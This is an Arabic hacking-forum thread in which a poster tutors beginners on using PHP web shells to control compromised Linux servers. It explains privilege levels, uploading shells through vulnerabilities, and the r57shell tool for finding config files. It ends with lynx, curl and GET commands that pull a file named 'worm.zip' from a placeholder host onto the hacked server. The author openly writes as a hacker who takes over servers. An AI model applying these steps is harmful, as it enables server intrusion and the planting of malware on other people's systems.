في البداية اكثر الاعضاء يسألون
ماهو الشل؟
وما الفائده منه
وما هو استخداماته؟
وكيف يتم رفعه ؟
وماهي اوامره؟
اوكي سأرد على كل هته الاسئلة , ( انا لا اريد ردود بل اريد استفادة )
ماهو الشل؟
وهو عبارة عن سكربت مكتوب بلغة phpshell ويعمل الشل كوسيط بينك وبين النظام الذي هو Linux حيث يستقبل الاوامر منك ويرسلها الى السيرفر المخترق وتعرض نتائج الاوامر على الشل.
ما هو استخدامه ؟
الان الكل يسمع عن الشل وما يعرف شنو استخداماته
وانا اقولك له استخدامات كثيرة فنحن ال* هـــ ـاكر* هـــ ـاكر* هـــ ـاكرز نستخدمه في السيطرة على السيرفرات !!
والان جينا للمفيد يستخدم للسيطرة على السيرفر واحيانا السيطرة بشكل كامل على السيرفر والتنقل بالسيرفر ووتصفح ملفاته والتعديل عليها واحيانا يستخدم فى فك الزاند وهذا حسب صلاحياتك على السيرفر
واكيد سوف تقول لي ما هي الصلاحيات ؟
وانا اقولك الصلاحيات يعني انت ايه على السيرفر يعنى ايه موقعك عليه
الصلاحيات على السيرفر
1- Root اي انت مدير السيرفر يعني خلاص مافي شي يوقف قدامك تحذف تعدل تضيف حساب على السيرفر وكذا
2- User هنا صلاحياتك على الموقع الي انت رافعلة شل فقط اكرر على الموقع الي انت رافعلة شل فقط اي تعدل تعطي تصاريح الا اذا انتقلت لحالة الرووت
3- nobody, http, apache هنا كلها نفس الشي ما تقدر تحذف ملفات او تعطي تصاريح للملفات
ولكن هذه الصلاحيات فيها ميزة حلوة وهي
انك تقدر تتصفح الحسابات الي على السيرفر اي المواقع التي على السيرفر عكس صلاحيات اليوزر حيث صلاحياتك على الموقع الي انت رافعة شل فقط
ولكن في سؤال مهم وهي اكيد انت راح
تقولي كيف اعرف صلاحياتي على السيرفر؟
وانا اقولك وانت في الشل تكتب id لمعرفة صلاحياتك وهو امر لينكس
ومن الكلام الي سبق اكيد انت استنجت شي وهي انك حتى تشغل الشل لازم ترفعة على موقع واكيد في سؤال بالطريق وهو :
كيف ارفع الشل على موقع؟
وانا اقولك ولا يهمك يتم رفع الشل عن طريق الثغرات واكيد راح تسأل وتقول
ايه هي الثغرة؟ وانا اجاوبك مع انك مللتني من كثر اسالتك
الثغرة: وهي عبارة عن خطأ برمجي وضعف امني يساعدك في دخول نظام معين واختراقه وهذا الخطأ يمكننا استغلاله في أن نجعل النظام يقوم بتنفيذ أوامرنا التي نعطيها إليه واحيانا تساعدك الثغرة في الانتقال من حالة الى اخرى اي مثلا من نوبدي الى رووت حسب نوع الثغرة والثغرات تكون مكتوبة بلغة السي او البيرل او php الخ.....
والان الحمد لله عرفتوا شنو الثغرة ؟
المهم سأكتفي بهذا القذر , لنتابع الدرس ....
قاهر الضحايا AnasAnabir
رد مع اقتباس
anasanabir
مشاهدة ملفه الشخصي
إرسال رسالة خاصة إلى anasanabir
البحث عن جميع مشاركات anasanabir
#2
قديم 01-20-2008, 08:49 AM
anasanabir anasanabir غير متواجد حالياً
عضو جديد
تاريخ التسجيل: Jan 2008
المشاركات: 6
تابع
والان بعد ما الكل عرف ما هو الشل وانواعة واستخداماته راح اشرح لكم الشل الروسى
r57shell الشل الروسي الغني عن التعريف الذي انا افضله من بين كل هذه الشلات وهو يحتاج الى اوامر لينكس ولكن فيه اوامر البحث عن ملفات
الكونفك واوامر سحب الملفات اي الدوال لسحب الملفات جاهزة كلها وفيه ميزة تحميل ملفات من جهازك الى الموقع المخترق من خلاله
ماذا لو لم تعمل هذه الدالة؟ ( انت في الشل )
اقولك ولا يهمك في دوال غيرها مثلا دالة curl ايضا اذا اردت
التحقق من ان الدالة تعمل ما عليك الا كتابة which curl واليكم شرح بعض دوال السحب
ولنفترض ان الملف الذي نود سحبه هو worm.zip نبدا بالاداة lynx وطريقة سحب الملف كما يلي
كود:
lynx -source
www.xxx.com/worm.zip > worm.zip
والاداة curl استخدامها كالتالي
كود:
curl -o worm.zip
www.xxx.com/worm.zipواخيرا الدالة get استخدامها كالتالي
كود:
GET
www.xxx.com/worm.zip > worm.zip
الإثنين يوليو 21, 2008 6:29 am